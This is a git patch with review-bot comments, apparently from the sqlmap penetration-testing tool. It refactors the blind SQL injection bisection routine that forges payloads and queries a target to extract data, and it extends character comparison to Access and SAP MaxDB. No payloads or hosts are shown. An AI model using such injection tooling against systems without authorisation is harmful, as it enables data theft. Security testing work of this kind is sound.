From 98f5586b87d02cebbfdef41605042e8886b0c194 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Sat, 23 Oct 2010 08:05:24 +0000
Subject: [PATCH] minor update
---
 lib/techniques/blind/inference.py | 12 +++++++-----
 xml/queries.xml | 2 ++
 2 files changed, 9 insertions(+), 5 deletions(-)
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index b978c23b0..bb97112a6 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -17,6 +17,8 @@ from lib.core.common import dataToStdout
 from lib.core.common import getCharset
 from lib.core.common import goGoodSamaritan
 from lib.core.common import getPartRun
+from lib.core.common import popValue
+from lib.core.common import pushValue
 from lib.core.common import readInput
 from lib.core.common import replaceNewlineTabs
 from lib.core.common import safeStringFormat
@@ -113,7 +115,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 hintlock.release()
 if hintValue is not None and len(hintValue) >= idx:
- if kb.dbms == "SQLite":
+ if kb.dbms in ("SQLite", "Microsoft Access", "SAP MaxDB"):
 posValue = hintValue[idx-1]
 else:
 posValue = ord(hintValue[idx-1])
@@ -165,8 +167,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 position = (len(charTbl) >> 1)
 posValue = charTbl[position]
- if kb.dbms == "SQLite":
- posValueOld = posValue
+ if kb.dbms in ("SQLite", "Microsoft Access", "SAP MaxDB"):
+ pushValue(posValue)
 posValue = chr(posValue) if posValue < 128 else unichr(posValue)
 forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
@@ -174,8 +176,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 queriesCount[0] += 1
 result = Request.queryPage(urlencode(forgedPayload))
- if kb.dbms == "SQLite":
- posValue = posValueOld
+ if kb.dbms in ("SQLite", "Microsoft Access", "SAP MaxDB"):
+ posValue = popValue()
 if result:
 minValue = posValue
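Review bot: The DBMS tuple `("SQLite", "Microsoft Access", "SAP MaxDB")` is written out three times: at the hint check in this hunk, and again at the `pushValue` and `popValue` sites in the two later hunks of this file. If one copy is edited and the others are not, the push and the pop stop pairing up, and `posValue` would stay a character where the code after the request (`minValue = posValue`) appears to expect the integer. I would name the set once, for example a module-level `CHAR_COMPARE_DBMS = ("SQLite", "Microsoft Access", "SAP MaxDB")`, and test `kb.dbms in CHAR_COMPARE_DBMS` at all three places. The body of bisection begins and ends outside these hunks, so whether a nearer scope would do is not visible here.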
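Review bot: Swapping the local `posValueOld` for `pushValue(posValue)` before the request and `posValue = popValue()` after it (the next hunk) moves the saved value out of the function into whatever storage those helpers use, which is not shown on this page. The `hintlock.release()` in the earlier hunk suggests this code runs on several threads; if the helpers share one stack, two threads can interleave their push and pop and each restore the other's value. An exception raised by `Request.queryPage` between the two calls would also leave a stale entry on that stack. Unless the stack is per-thread, I would keep the local (`posValueOld = posValue` / `posValue = posValueOld`), or at minimum do the pop in a `finally:` around the request.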
diff --git a/xml/queries.xml b/xml/queries.xml
index 9a6fa34ac..2fce488f3 100644
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -354,6 +354,7 @@
+
@@ -429,6 +430,7 @@
+